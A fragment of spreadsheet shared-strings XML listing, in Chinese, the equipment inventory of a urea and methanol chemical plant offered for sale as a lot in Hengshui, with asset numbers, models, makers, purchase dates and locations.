  <si>
    <t>01597</t>
  </si>
  <si>
    <t>压滤机</t>
  </si>
  <si>
    <t>XZM50/900-U</t>
  </si>
  <si>
    <t>01545</t>
  </si>
  <si>
    <t>砂浆泵整机</t>
  </si>
  <si>
    <t>65UHB-ZH-A-15-50\11</t>
  </si>
  <si>
    <t>宜兴宙斯泵业有限公司</t>
  </si>
  <si>
    <t>2010.01.28</t>
  </si>
  <si>
    <t>尿素南二脱</t>
  </si>
  <si>
    <t>01739</t>
  </si>
  <si>
    <t>MILONGM09900 0.25kw</t>
  </si>
  <si>
    <t>2012.02.27</t>
  </si>
  <si>
    <t>尿素车间</t>
  </si>
  <si>
    <t>01918</t>
  </si>
  <si>
    <t>叉车</t>
  </si>
  <si>
    <t>CPC25DZ</t>
  </si>
  <si>
    <t>辆</t>
  </si>
  <si>
    <t>2012.06.25</t>
  </si>
  <si>
    <t>01933</t>
  </si>
  <si>
    <t>DFS25-50X5</t>
  </si>
  <si>
    <t>2012.07.25</t>
  </si>
  <si>
    <t>01938</t>
  </si>
  <si>
    <t>储罐(304)</t>
  </si>
  <si>
    <t>φ450</t>
  </si>
  <si>
    <t>2012.08.22</t>
  </si>
  <si>
    <t>01954</t>
  </si>
  <si>
    <t>5.5kw/380变频器</t>
  </si>
  <si>
    <t>5.5kw/380</t>
  </si>
  <si>
    <t>2013.03.31</t>
  </si>
  <si>
    <t>01955</t>
  </si>
  <si>
    <t>160kw变频器</t>
  </si>
  <si>
    <t>160kw</t>
  </si>
  <si>
    <t>02034</t>
  </si>
  <si>
    <t>网络集成及设备</t>
  </si>
  <si>
    <t>尿素车间  老脱碳岗位</t>
  </si>
  <si>
    <t>4800*33025*18</t>
  </si>
  <si>
    <t>气液分离器</t>
  </si>
  <si>
    <t>3200*7300</t>
  </si>
  <si>
    <t>3600*12056*16</t>
  </si>
  <si>
    <t>XLD5-59-7.5</t>
  </si>
  <si>
    <t>常州国贸国泰</t>
  </si>
  <si>
    <t>UHB-2K-A</t>
  </si>
  <si>
    <t>宙斯</t>
  </si>
  <si>
    <t>尿素车间水处理、脱盐水岗位</t>
  </si>
  <si>
    <t>01533</t>
  </si>
  <si>
    <t>深度除盐水处理设备</t>
  </si>
  <si>
    <t>150m3/h</t>
  </si>
  <si>
    <t>2009.11.26</t>
  </si>
  <si>
    <t>尿素车间水处理岗位</t>
  </si>
  <si>
    <t>02056</t>
  </si>
  <si>
    <t>BRQ-200㎡</t>
  </si>
  <si>
    <t>尿素车间水解岗位</t>
  </si>
  <si>
    <t>02067</t>
  </si>
  <si>
    <t>不锈钢化工泵（整机）</t>
  </si>
  <si>
    <t>IH65-40-250</t>
  </si>
  <si>
    <t>2015.10.26</t>
  </si>
  <si>
    <t>水处理岗位</t>
  </si>
  <si>
    <t>00315</t>
  </si>
  <si>
    <t>反渗透水设备</t>
  </si>
  <si>
    <t>iot/h</t>
  </si>
  <si>
    <t>脱盐水</t>
  </si>
  <si>
    <t>00316</t>
  </si>
  <si>
    <t>三通溜管</t>
  </si>
  <si>
    <t>jz-100</t>
  </si>
  <si>
    <t>00644</t>
  </si>
  <si>
    <t>反渗透水处理装置</t>
  </si>
  <si>
    <t>30T/N</t>
  </si>
  <si>
    <t>01003</t>
  </si>
  <si>
    <t>60T/H反渗透装置</t>
  </si>
  <si>
    <t>60T</t>
  </si>
  <si>
    <t>01337</t>
  </si>
  <si>
    <t>反渗透装置</t>
  </si>
  <si>
    <t>01390</t>
  </si>
  <si>
    <t>沙滤器</t>
  </si>
  <si>
    <t>01676</t>
  </si>
  <si>
    <t>反渗透设备</t>
  </si>
  <si>
    <t>100m3/h</t>
  </si>
  <si>
    <t>脱盐水岗位</t>
  </si>
  <si>
    <t>反洗泵</t>
  </si>
  <si>
    <t>IS200-150-250</t>
  </si>
  <si>
    <t>唐山市水泵</t>
  </si>
  <si>
    <t>产品水泵</t>
  </si>
  <si>
    <t>IS100-65-200</t>
  </si>
  <si>
    <t>ISG100-200LGL</t>
  </si>
  <si>
    <t>河北海通</t>
  </si>
  <si>
    <t>IS100-80-160</t>
  </si>
  <si>
    <t>清水泵</t>
  </si>
  <si>
    <t>KQW150/315-30/4</t>
  </si>
  <si>
    <t>上海</t>
  </si>
  <si>
    <t>产品水槽</t>
  </si>
  <si>
    <t>250平方</t>
  </si>
  <si>
    <t>自制</t>
  </si>
  <si>
    <t>一次水槽</t>
  </si>
  <si>
    <t>清洗泵</t>
  </si>
  <si>
    <t>DFWH100-125</t>
  </si>
  <si>
    <t>上海东方</t>
  </si>
  <si>
    <t>高压泵、电机</t>
  </si>
  <si>
    <t>BWT200LA 3*4YD-2</t>
  </si>
  <si>
    <t>高压泵</t>
  </si>
  <si>
    <t>CR64-6</t>
  </si>
  <si>
    <t>丹麦</t>
  </si>
  <si>
    <t>CDL85-50</t>
  </si>
  <si>
    <t>南房泵业</t>
  </si>
  <si>
    <t>尿素车间新循环水岗位</t>
  </si>
  <si>
    <t>01451</t>
  </si>
  <si>
    <t>冷却塔</t>
  </si>
  <si>
    <t>L70</t>
  </si>
  <si>
    <t>2008.07.24</t>
  </si>
  <si>
    <t>新循环水</t>
  </si>
  <si>
    <t>01534</t>
  </si>
  <si>
    <t>尿素2000立方米循环水工程</t>
  </si>
  <si>
    <t>00350</t>
  </si>
  <si>
    <t>轴流风机</t>
  </si>
  <si>
    <t>L47</t>
  </si>
  <si>
    <t>上海化工机械二厂</t>
  </si>
  <si>
    <t>循环水塔</t>
  </si>
  <si>
    <t>00351</t>
  </si>
  <si>
    <t>离心风机</t>
  </si>
  <si>
    <t>风筒</t>
  </si>
  <si>
    <t>尿素车间溴化锂岗位</t>
  </si>
  <si>
    <t>00825</t>
  </si>
  <si>
    <t>溴化锂</t>
  </si>
  <si>
    <t>00985</t>
  </si>
  <si>
    <t>JF4T</t>
  </si>
  <si>
    <t>00986</t>
  </si>
  <si>
    <t>收水器</t>
  </si>
  <si>
    <t>80平方</t>
  </si>
  <si>
    <t>00987</t>
  </si>
  <si>
    <t>网格</t>
  </si>
  <si>
    <t>1600平方40型</t>
  </si>
  <si>
    <t>01391</t>
  </si>
  <si>
    <t>热水型溴化锂冷水机组</t>
  </si>
  <si>
    <t>RXZ(110/75)-407(180-8)m</t>
  </si>
  <si>
    <t>江苏双良空调设备股份有限公司</t>
  </si>
  <si>
    <t>2008.06.19</t>
  </si>
  <si>
    <t>单机双吸离心泵</t>
  </si>
  <si>
    <t>KQSN350-N27/273</t>
  </si>
  <si>
    <t>00525</t>
  </si>
  <si>
    <t>机井</t>
  </si>
  <si>
    <t>200m</t>
  </si>
  <si>
    <t>眼</t>
  </si>
  <si>
    <t>尿素车间机制厂房西侧</t>
  </si>
  <si>
    <t>00958</t>
  </si>
  <si>
    <t>80AFB-60</t>
  </si>
  <si>
    <t>01502</t>
  </si>
  <si>
    <t>潜水泵</t>
  </si>
  <si>
    <t>350S75B</t>
  </si>
  <si>
    <t>2009.04.27</t>
  </si>
  <si>
    <t>01604</t>
  </si>
  <si>
    <t>离心泵</t>
  </si>
  <si>
    <t>100IS-80-125</t>
  </si>
  <si>
    <t>01465</t>
  </si>
  <si>
    <t>尿素2500变压器改造</t>
  </si>
  <si>
    <t>电仪车间</t>
  </si>
  <si>
    <t>01622</t>
  </si>
  <si>
    <t>蒸发冷内件</t>
  </si>
  <si>
    <t>2011.01.27</t>
  </si>
  <si>
    <t>原尿素 化工冰机厂房北房顶</t>
  </si>
  <si>
    <t>00299</t>
  </si>
  <si>
    <t>4立方</t>
  </si>
  <si>
    <t>尿素</t>
  </si>
  <si>
    <t>00303</t>
  </si>
  <si>
    <t>氨罐</t>
  </si>
  <si>
    <t>100立方</t>
  </si>
  <si>
    <t>00689</t>
  </si>
  <si>
    <t>硫分析仪</t>
  </si>
  <si>
    <t>HC-2A</t>
  </si>
  <si>
    <t>00701</t>
  </si>
  <si>
    <t>闪蒸槽</t>
  </si>
  <si>
    <t>00720</t>
  </si>
  <si>
    <t>00810</t>
  </si>
  <si>
    <t>降压液阻柜</t>
  </si>
  <si>
    <t>00811</t>
  </si>
  <si>
    <t>低压配电屏</t>
  </si>
  <si>
    <t>GGD</t>
  </si>
  <si>
    <t>00812</t>
  </si>
  <si>
    <t>GGD-10A</t>
  </si>
  <si>
    <t>00813</t>
  </si>
  <si>
    <t>FGLZ-03</t>
  </si>
  <si>
    <t>00814</t>
  </si>
  <si>
    <t>01264</t>
  </si>
  <si>
    <t>钩头秤</t>
  </si>
  <si>
    <t>OCS-3T</t>
  </si>
  <si>
    <t>01573</t>
  </si>
  <si>
    <t>PLC控制器</t>
  </si>
  <si>
    <t>合    计</t>
  </si>
  <si>
    <t>整套处置有优惠，分隔处置有参考价，厂内现状交货（衡水市）；不零卖，买方承担拆解和外运费用。</t>
  </si>
  <si>
    <t>购置日期</t>
  </si>
  <si>
    <t>00750</t>
  </si>
  <si>
    <t>励磁控制器</t>
  </si>
  <si>
    <t>KGLF-11</t>
  </si>
  <si>
    <t>1、2号M16励磁柜</t>
  </si>
  <si>
    <t>00931</t>
  </si>
  <si>
    <t>防爆动力箱</t>
  </si>
  <si>
    <t>河北京冀防爆</t>
  </si>
  <si>
    <t>1.2M合成</t>
  </si>
  <si>
    <t>00938</t>
  </si>
  <si>
    <t>防爆控制箱</t>
  </si>
  <si>
    <t>01094</t>
  </si>
  <si>
    <t>可控硅调压器</t>
  </si>
  <si>
    <t>1500KVA  KTS</t>
  </si>
  <si>
    <t>2006.10.01</t>
  </si>
  <si>
    <t>01095</t>
  </si>
  <si>
    <t>电加热器</t>
  </si>
  <si>
    <t>1200KW 380V/1500A</t>
  </si>
  <si>
    <t>1.2M合成塔内</t>
  </si>
  <si>
    <t>00593</t>
  </si>
  <si>
    <t>TYSK380V1600A</t>
  </si>
  <si>
    <t>1.2M甲醇</t>
  </si>
  <si>
    <t>00594</t>
  </si>
  <si>
    <t>1000KW</t>
  </si>
  <si>
    <t>00983</t>
  </si>
  <si>
    <t>电炉</t>
  </si>
  <si>
    <t>1200KW</t>
  </si>
  <si>
    <t>1.4M甲醇塔内</t>
  </si>
  <si>
    <t>00984</t>
  </si>
  <si>
    <t>调压器</t>
  </si>
  <si>
    <t>1500</t>
  </si>
  <si>
    <t>1.4M甲醇</t>
  </si>
  <si>
    <t>01383</t>
  </si>
  <si>
    <t>防爆操作箱</t>
  </si>
  <si>
    <t>1.6M合成</t>
  </si>
  <si>
    <t>01416</t>
  </si>
  <si>
    <t>1.6M合成塔内</t>
  </si>
  <si>
    <t>01434</t>
  </si>
  <si>
    <t>高压电控</t>
  </si>
  <si>
    <t>1.6M合成操作室</t>
  </si>
  <si>
    <t>01278</t>
  </si>
  <si>
    <t>高压油浸调压电源</t>
  </si>
  <si>
    <t>TSA-2200</t>
  </si>
  <si>
    <t>2007.11.29</t>
  </si>
  <si>
    <t>10KV站</t>
  </si>
  <si>
    <t>01381</t>
  </si>
  <si>
    <t>中置手车柜(高压开关柜)</t>
  </si>
  <si>
    <t>KYN28-12</t>
  </si>
  <si>
    <t>面</t>
  </si>
  <si>
    <t>01384</t>
  </si>
  <si>
    <t>高压柜</t>
  </si>
  <si>
    <t>01458</t>
  </si>
  <si>
    <t>高压开关柜</t>
  </si>
  <si>
    <t>01645</t>
  </si>
  <si>
    <t>KYN28-10</t>
  </si>
  <si>
    <t>2011.06.26</t>
  </si>
  <si>
    <t>01653</t>
  </si>
  <si>
    <t>油浸式电力变压器</t>
  </si>
  <si>
    <t>S9-2000/10</t>
  </si>
  <si>
    <t>01380</t>
  </si>
  <si>
    <t>交直流电源设备</t>
  </si>
  <si>
    <t>GZDW</t>
  </si>
  <si>
    <t>10KV站控制室</t>
  </si>
  <si>
    <t>01605</t>
  </si>
  <si>
    <t>电机</t>
  </si>
  <si>
    <t>JS138-8 245KW 38OV</t>
  </si>
  <si>
    <t>196风机</t>
  </si>
  <si>
    <t>00187</t>
  </si>
  <si>
    <t>低压柜</t>
  </si>
  <si>
    <t>PGL</t>
  </si>
  <si>
    <t>3.4米变换</t>
  </si>
  <si>
    <t>00188</t>
  </si>
  <si>
    <t>01382</t>
  </si>
  <si>
    <t>低压进线柜</t>
  </si>
  <si>
    <t>冀州</t>
  </si>
  <si>
    <t>3.8米变换5、南楼1</t>
  </si>
  <si>
    <t>00655</t>
  </si>
  <si>
    <t>380KW</t>
  </si>
  <si>
    <t>303风机</t>
  </si>
  <si>
    <t>00765</t>
  </si>
  <si>
    <t>2004.10.31</t>
  </si>
  <si>
    <t>3号M16励磁柜</t>
  </si>
  <si>
    <t>01646</t>
  </si>
  <si>
    <t>GGD  XL-21</t>
  </si>
  <si>
    <t>4.4M变换台、南二脱1面</t>
  </si>
  <si>
    <t>00842</t>
  </si>
  <si>
    <t>控制机(励磁柜)</t>
  </si>
  <si>
    <t>4号M16励磁柜</t>
  </si>
  <si>
    <t>01046</t>
  </si>
  <si>
    <t>低压配电柜</t>
  </si>
  <si>
    <t>XL-21</t>
  </si>
  <si>
    <t>河北华冲</t>
  </si>
  <si>
    <t>50T东南楼</t>
  </si>
  <si>
    <t>01048</t>
  </si>
  <si>
    <t>PGL-2</t>
  </si>
  <si>
    <t>50T</t>
  </si>
  <si>
    <t>01105</t>
  </si>
  <si>
    <t>2006.11.05</t>
  </si>
  <si>
    <t>01119</t>
  </si>
  <si>
    <t>2006.12.25</t>
  </si>
  <si>
    <t>01475</t>
  </si>
  <si>
    <t>变频器</t>
  </si>
  <si>
    <t>5.5KW曲府</t>
  </si>
  <si>
    <t>2008.10.28</t>
  </si>
  <si>
    <t>50T配电柜内</t>
  </si>
  <si>
    <t>01476</t>
  </si>
  <si>
    <t>SPN15G11S-4CX</t>
  </si>
  <si>
    <t>00617</t>
  </si>
  <si>
    <t>75KW</t>
  </si>
  <si>
    <t>6.5锅炉</t>
  </si>
  <si>
    <t>01995</t>
  </si>
  <si>
    <t>可拆式板式换热器</t>
  </si>
  <si>
    <t>BRO.4型50平方</t>
  </si>
  <si>
    <t>2013.08.31</t>
  </si>
  <si>
    <t>6kw发电岗位</t>
  </si>
  <si>
    <t>00190</t>
  </si>
  <si>
    <t>控制箱</t>
  </si>
  <si>
    <t>800甲醇</t>
  </si>
  <si>
    <t>00251</t>
  </si>
  <si>
    <t>00256</t>
  </si>
  <si>
    <t>按钮箱</t>
  </si>
  <si>
    <t>00264</t>
  </si>
  <si>
    <t>00619</t>
  </si>
  <si>
    <t>550KW</t>
  </si>
  <si>
    <t>800甲醇塔内</t>
  </si>
  <si>
    <t>00797</t>
  </si>
  <si>
    <t>φ900×6500 550KW</t>
  </si>
  <si>
    <t>01036</t>
  </si>
  <si>
    <t>EV1000-4T0055G</t>
  </si>
  <si>
    <t>氨回收</t>
  </si>
  <si>
    <t>配电柜</t>
  </si>
  <si>
    <t>00633</t>
  </si>
  <si>
    <t>M40机交流电动机软起装置</t>
  </si>
  <si>
    <t>GZYQ-3000/6</t>
  </si>
  <si>
    <t>湖北</t>
  </si>
  <si>
    <t>2003.10.28</t>
  </si>
  <si>
    <t>北10KV站M40</t>
  </si>
  <si>
    <t>00634</t>
  </si>
  <si>
    <t>星点柜(高压开关柜)</t>
  </si>
  <si>
    <t>GG-1A</t>
  </si>
  <si>
    <t>00223</t>
  </si>
  <si>
    <t>北变换</t>
  </si>
  <si>
    <t>00224</t>
  </si>
  <si>
    <t>00225</t>
  </si>
  <si>
    <t>00226</t>
  </si>
  <si>
    <t>00213</t>
  </si>
  <si>
    <t>35kv高压开关柜</t>
  </si>
  <si>
    <t>GBC-35</t>
  </si>
  <si>
    <t>山东淄博</t>
  </si>
  <si>
    <t>北站</t>
  </si>
  <si>
    <t>00214</t>
  </si>
  <si>
    <t>00215</t>
  </si>
  <si>
    <t>00254</t>
  </si>
  <si>
    <t>00257</t>
  </si>
  <si>
    <t>低压配电箱</t>
  </si>
  <si>
    <t>00258</t>
  </si>
  <si>
    <t>00278</t>
  </si>
  <si>
    <t>风机(轴流)</t>
  </si>
  <si>
    <t>T35-11</t>
  </si>
  <si>
    <t>00197</t>
  </si>
  <si>
    <t>变压器</t>
  </si>
  <si>
    <t>s9-5000/10</t>
  </si>
  <si>
    <t>保定天威</t>
  </si>
  <si>
    <t>北站5000</t>
  </si>
  <si>
    <t>s9-2500/6.3</t>
  </si>
  <si>
    <t>00939</t>
  </si>
  <si>
    <t>XGN2</t>
  </si>
  <si>
    <t>北站6KV(三楼)</t>
  </si>
  <si>
    <t>01050</t>
  </si>
  <si>
    <t>XGN2-12</t>
  </si>
  <si>
    <t>2006.06.30</t>
  </si>
  <si>
    <t>01221</t>
  </si>
  <si>
    <t>01222</t>
  </si>
  <si>
    <t>01223</t>
  </si>
  <si>
    <t>00729</t>
  </si>
  <si>
    <t>变电站保护（自动化系统）</t>
  </si>
  <si>
    <t>35KV</t>
  </si>
  <si>
    <t>2004.05.26</t>
  </si>
  <si>
    <t>北站控制保护系统</t>
  </si>
  <si>
    <t>01480</t>
  </si>
  <si>
    <t>配电室高压柜</t>
  </si>
  <si>
    <t>GG1A</t>
  </si>
  <si>
    <t>2008.11.28</t>
  </si>
  <si>
    <t>北站一楼</t>
  </si>
  <si>
    <t>00781</t>
  </si>
  <si>
    <t>SFZ9-20000/35</t>
  </si>
  <si>
    <t>北站主变</t>
  </si>
  <si>
    <t>00635</t>
  </si>
  <si>
    <t>大冰机</t>
  </si>
  <si>
    <t>00636</t>
  </si>
  <si>
    <t>00730</t>
  </si>
  <si>
    <t>板式低压开关柜</t>
  </si>
  <si>
    <t>GGD2</t>
  </si>
  <si>
    <t>01748</t>
  </si>
  <si>
    <t>Y3554-2 315KW</t>
  </si>
  <si>
    <t>2012.04.13</t>
  </si>
  <si>
    <t>01930</t>
  </si>
  <si>
    <t>甲醇电加热器</t>
  </si>
  <si>
    <t>φ1200</t>
  </si>
  <si>
    <t>02010</t>
  </si>
  <si>
    <t>便携式工业热风机</t>
  </si>
  <si>
    <t>HBO-DR-1220-ZF-801-0.15</t>
  </si>
  <si>
    <t>电仪办公楼二楼</t>
  </si>
  <si>
    <t>01670</t>
  </si>
  <si>
    <t>汽轮发电机组</t>
  </si>
  <si>
    <t>CB6-3.43/1.47/0.39</t>
  </si>
  <si>
    <t>山东青能</t>
  </si>
  <si>
    <t xml:space="preserve"> 河西发电</t>
  </si>
  <si>
    <t>01989</t>
  </si>
  <si>
    <t>PLC一套、DCS系统</t>
  </si>
  <si>
    <t>6GK1562-1AA00</t>
  </si>
  <si>
    <t>00611</t>
  </si>
  <si>
    <t>东20T</t>
  </si>
  <si>
    <t>00631</t>
  </si>
  <si>
    <t>EV2000</t>
  </si>
  <si>
    <t>东20T、老尿素1一甲泵、风机</t>
  </si>
  <si>
    <t>00269</t>
  </si>
  <si>
    <t>东20T泵房</t>
  </si>
  <si>
    <t>00277</t>
  </si>
  <si>
    <t>00988</t>
  </si>
  <si>
    <t>东烃化塔斯社内</t>
  </si>
  <si>
    <t>00268</t>
  </si>
  <si>
    <t>自藕减压起动柜</t>
  </si>
  <si>
    <t>XQJ</t>
  </si>
  <si>
    <t>00270</t>
  </si>
  <si>
    <t>启动柜</t>
  </si>
  <si>
    <t>01655</t>
  </si>
  <si>
    <t>液体电阻启动柜</t>
  </si>
  <si>
    <t>GZYQ3A-6000/10-YT</t>
  </si>
  <si>
    <t>上海追日</t>
  </si>
  <si>
    <t>化工车间10KV站306压缩机</t>
  </si>
  <si>
    <t>01656</t>
  </si>
  <si>
    <t>XGN-12</t>
  </si>
  <si>
    <t>01541</t>
  </si>
  <si>
    <t>S9-1600/10kv</t>
  </si>
  <si>
    <t>2009.12.27</t>
  </si>
  <si>
    <t>化工车间4.4M变换</t>
  </si>
  <si>
    <t>S9-800/10</t>
  </si>
  <si>
    <t>01946</t>
  </si>
  <si>
    <t>KYN28-12型10面</t>
  </si>
  <si>
    <t>2012.09.25</t>
  </si>
  <si>
    <t>化工车间M306压缩机岗位</t>
  </si>
  <si>
    <t>00204</t>
  </si>
  <si>
    <t>化工老循环水</t>
  </si>
  <si>
    <t>00205</t>
  </si>
  <si>
    <t>00206</t>
  </si>
  <si>
    <t>00207</t>
  </si>
  <si>
    <t>00221</t>
  </si>
  <si>
    <t>00222</t>
  </si>
  <si>
    <t>00203</t>
  </si>
  <si>
    <t>化工新循环水</t>
  </si>
  <si>
    <t>00241</t>
  </si>
  <si>
    <t>老'化工循环水</t>
  </si>
  <si>
    <t>00210</t>
  </si>
  <si>
    <t>可控硅控制箱</t>
  </si>
  <si>
    <t>630KVA</t>
  </si>
  <si>
    <t>甲醇</t>
  </si>
  <si>
    <t>00236</t>
  </si>
  <si>
    <t>配电盘</t>
  </si>
  <si>
    <t>00238</t>
  </si>
  <si>
    <t>华冲</t>
  </si>
  <si>
    <t>00240</t>
  </si>
  <si>
    <t>00242</t>
  </si>
  <si>
    <t>配电屏</t>
  </si>
  <si>
    <t>00243</t>
  </si>
  <si>
    <t>00208</t>
  </si>
  <si>
    <t>精炼</t>
  </si>
  <si>
    <t>00235</t>
  </si>
  <si>
    <t>配电箱盘</t>
  </si>
  <si>
    <t>精炼、老脱碳</t>
  </si>
  <si>
    <t>01633</t>
  </si>
  <si>
    <t>变压器（低压变高压）</t>
  </si>
  <si>
    <t>2011.04.26</t>
  </si>
  <si>
    <t>静电除尘</t>
  </si>
  <si>
    <t>00722</t>
  </si>
  <si>
    <t>静电除焦电源</t>
  </si>
  <si>
    <t>JT-1</t>
  </si>
  <si>
    <t>静电除尘控制盒</t>
  </si>
  <si>
    <t>00271</t>
  </si>
  <si>
    <t>FRENIC-5000</t>
  </si>
  <si>
    <t>老尿素氨泵</t>
  </si>
  <si>
    <t>00273</t>
  </si>
  <si>
    <t>00274</t>
  </si>
  <si>
    <t>00198</t>
  </si>
  <si>
    <t>50kw</t>
  </si>
  <si>
    <t>河北新河</t>
  </si>
  <si>
    <t>老尿素变</t>
  </si>
  <si>
    <t>00910</t>
  </si>
  <si>
    <t>SQ-2000KVA</t>
  </si>
  <si>
    <t>00200</t>
  </si>
  <si>
    <t>老尿素二甲泵</t>
  </si>
  <si>
    <t>00266</t>
  </si>
  <si>
    <t>00276</t>
  </si>
  <si>
    <t>老尿素配电室</t>
  </si>
  <si>
    <t>00201</t>
  </si>
  <si>
    <t>老尿素一甲泵</t>
  </si>
  <si>
    <t>00265</t>
  </si>
  <si>
    <t>00192</t>
  </si>
  <si>
    <t>老脱碳</t>
  </si>
  <si>
    <t>00249</t>
  </si>
  <si>
    <t>减压起动柜</t>
  </si>
  <si>
    <t>S9-2000/6.3</t>
  </si>
  <si>
    <t>保定尼尔</t>
  </si>
  <si>
    <t>XQ01-190</t>
  </si>
  <si>
    <t>营口</t>
  </si>
  <si>
    <t>01246</t>
  </si>
  <si>
    <t>低压开关柜</t>
  </si>
  <si>
    <t>GGD3</t>
  </si>
  <si>
    <t>2007.06.30</t>
  </si>
  <si>
    <t>南10KV</t>
  </si>
  <si>
    <t>01249</t>
  </si>
  <si>
    <t>动力柜</t>
  </si>
  <si>
    <t>00227</t>
  </si>
  <si>
    <t>主变控制保护屏</t>
  </si>
  <si>
    <t>PK-1</t>
  </si>
  <si>
    <t>南4.5号变</t>
  </si>
  <si>
    <t>00585</t>
  </si>
  <si>
    <t>南楼</t>
  </si>
  <si>
    <t>00613</t>
  </si>
  <si>
    <t>衡水</t>
  </si>
  <si>
    <t>00182</t>
  </si>
  <si>
    <t>镉镍电池屏</t>
  </si>
  <si>
    <t>BEGN-Ⅲ</t>
  </si>
  <si>
    <t>南站</t>
  </si>
  <si>
    <t>00183</t>
  </si>
  <si>
    <t>00228</t>
  </si>
  <si>
    <t>中央信号屏</t>
  </si>
  <si>
    <t>00229</t>
  </si>
  <si>
    <t>电度表屏</t>
  </si>
  <si>
    <t>00211</t>
  </si>
  <si>
    <t>10000/35</t>
  </si>
  <si>
    <t>南站1#变</t>
  </si>
  <si>
    <t>00864</t>
  </si>
  <si>
    <t>变压器基础</t>
  </si>
  <si>
    <t>2000</t>
  </si>
  <si>
    <t>座</t>
  </si>
  <si>
    <t>00870</t>
  </si>
  <si>
    <t>变压器安装工料弗</t>
  </si>
  <si>
    <t>01566</t>
  </si>
  <si>
    <t>变电站综合自动化系统</t>
  </si>
  <si>
    <t>RH-2000S</t>
  </si>
  <si>
    <t>00189</t>
  </si>
  <si>
    <t>南站15、污水5、造气北楼5</t>
  </si>
  <si>
    <t>01580</t>
  </si>
  <si>
    <t>南站1万变压器</t>
  </si>
  <si>
    <t>00231</t>
  </si>
  <si>
    <t>35kv保护屏</t>
  </si>
  <si>
    <t>南站2# 3#变</t>
  </si>
  <si>
    <t>00181</t>
  </si>
  <si>
    <t>S9-5000/35</t>
  </si>
  <si>
    <t>南站2#变</t>
  </si>
  <si>
    <t>00194</t>
  </si>
  <si>
    <t>南站3#变</t>
  </si>
  <si>
    <t>00179</t>
  </si>
  <si>
    <t>电力变压器</t>
  </si>
  <si>
    <t>SZ9R8-1600/38.5</t>
  </si>
  <si>
    <t>南站4#变</t>
  </si>
  <si>
    <t>00184</t>
  </si>
  <si>
    <t>南站6KV</t>
  </si>
  <si>
    <t>00202</t>
  </si>
  <si>
    <t>00267</t>
  </si>
  <si>
    <t>00725</t>
  </si>
  <si>
    <t>XGN</t>
  </si>
  <si>
    <t>00726</t>
  </si>
  <si>
    <t>XGN-65</t>
  </si>
  <si>
    <t>00727</t>
  </si>
  <si>
    <t>XGN-08</t>
  </si>
  <si>
    <t>00728</t>
  </si>
  <si>
    <t>XGN-20</t>
  </si>
  <si>
    <t>00834</t>
  </si>
  <si>
    <t>XGN GGIA-(F)</t>
  </si>
  <si>
    <t>00929</t>
  </si>
  <si>
    <t>M40压缩机高压开关柜</t>
  </si>
  <si>
    <t>2005.08.31</t>
  </si>
  <si>
    <t>00937</t>
  </si>
  <si>
    <t>XGN GG1A-(F)</t>
  </si>
  <si>
    <t>01051</t>
  </si>
  <si>
    <t>GG-1AF</t>
  </si>
  <si>
    <t>2006.07.01</t>
  </si>
  <si>
    <t>01052</t>
  </si>
  <si>
    <t>01106</t>
  </si>
  <si>
    <t>高压配电柜</t>
  </si>
  <si>
    <t>01523</t>
  </si>
  <si>
    <t>GGIA</t>
  </si>
  <si>
    <t>00586</t>
  </si>
  <si>
    <t>南站低压</t>
  </si>
  <si>
    <t>01047</t>
  </si>
  <si>
    <t>低压配电柜.</t>
  </si>
  <si>
    <t>00632</t>
  </si>
  <si>
    <t>电流互感器</t>
  </si>
  <si>
    <t>LCW-35</t>
  </si>
  <si>
    <t>南站进户</t>
  </si>
  <si>
    <t>01574</t>
  </si>
  <si>
    <t>三相三线电子式全功能电能表</t>
  </si>
  <si>
    <t>DSSD237型</t>
  </si>
  <si>
    <t>2010.05.27</t>
  </si>
  <si>
    <t>南站进户表</t>
  </si>
  <si>
    <t>00932</t>
  </si>
  <si>
    <t>站变手车柜</t>
  </si>
  <si>
    <t>GFC-35</t>
  </si>
  <si>
    <t>南站站变</t>
  </si>
  <si>
    <t>00180</t>
  </si>
  <si>
    <t>低压控制屏</t>
  </si>
  <si>
    <t>南站直流配电</t>
  </si>
  <si>
    <t>00186</t>
  </si>
  <si>
    <t>控制盘</t>
  </si>
  <si>
    <t>南站主控室2-3#变</t>
  </si>
  <si>
    <t>01433</t>
  </si>
  <si>
    <t>低压电控</t>
  </si>
  <si>
    <t>01429</t>
  </si>
  <si>
    <t>电动机</t>
  </si>
  <si>
    <t>400KW</t>
  </si>
  <si>
    <t>尿素循环水泵</t>
  </si>
  <si>
    <t>01530</t>
  </si>
  <si>
    <t>Y250M37KW6P</t>
  </si>
  <si>
    <t>水处理</t>
  </si>
  <si>
    <t>00731</t>
  </si>
  <si>
    <t>PZ30JP</t>
  </si>
  <si>
    <t>2004.05.27</t>
  </si>
  <si>
    <t>水汽车间50T</t>
  </si>
  <si>
    <t>00732</t>
  </si>
  <si>
    <t>LXF3002</t>
  </si>
  <si>
    <t>水汽车间</t>
  </si>
  <si>
    <t>00733</t>
  </si>
  <si>
    <t>BXM53</t>
  </si>
  <si>
    <t>00863</t>
  </si>
  <si>
    <t>Y630-12-800KW</t>
  </si>
  <si>
    <t>水汽车间691</t>
  </si>
  <si>
    <t>配电柜（低压）</t>
  </si>
  <si>
    <t>水汽</t>
  </si>
  <si>
    <t>河北天业</t>
  </si>
  <si>
    <t>00212</t>
  </si>
  <si>
    <t>1600/6.3</t>
  </si>
  <si>
    <t>脱S2#</t>
  </si>
  <si>
    <t>S9-1000/6.3</t>
  </si>
  <si>
    <t>铁岭</t>
  </si>
  <si>
    <t>00244</t>
  </si>
  <si>
    <t>脱硫</t>
  </si>
  <si>
    <t>00245</t>
  </si>
  <si>
    <t>00246</t>
  </si>
  <si>
    <t>00248</t>
  </si>
  <si>
    <t>00250</t>
  </si>
  <si>
    <t>00252</t>
  </si>
  <si>
    <t>00259</t>
  </si>
  <si>
    <t>00260</t>
  </si>
  <si>
    <t>00261</t>
  </si>
  <si>
    <t>动力配电屏</t>
  </si>
  <si>
    <t>00262</t>
  </si>
  <si>
    <t>01045</t>
  </si>
  <si>
    <t>01118</t>
  </si>
  <si>
    <t>01463</t>
  </si>
  <si>
    <t>软起动控制柜</t>
  </si>
  <si>
    <t>追日/天津</t>
  </si>
  <si>
    <t>01464</t>
  </si>
  <si>
    <t>90KW</t>
  </si>
  <si>
    <t>00253</t>
  </si>
  <si>
    <t>s9-1600/6.3</t>
  </si>
  <si>
    <t>脱硫1# 造气</t>
  </si>
  <si>
    <t>00782</t>
  </si>
  <si>
    <t>脱碳变</t>
  </si>
  <si>
    <t>00195</t>
  </si>
  <si>
    <t>引风电机变频器</t>
  </si>
  <si>
    <t>西20T</t>
  </si>
  <si>
    <t>00196</t>
  </si>
  <si>
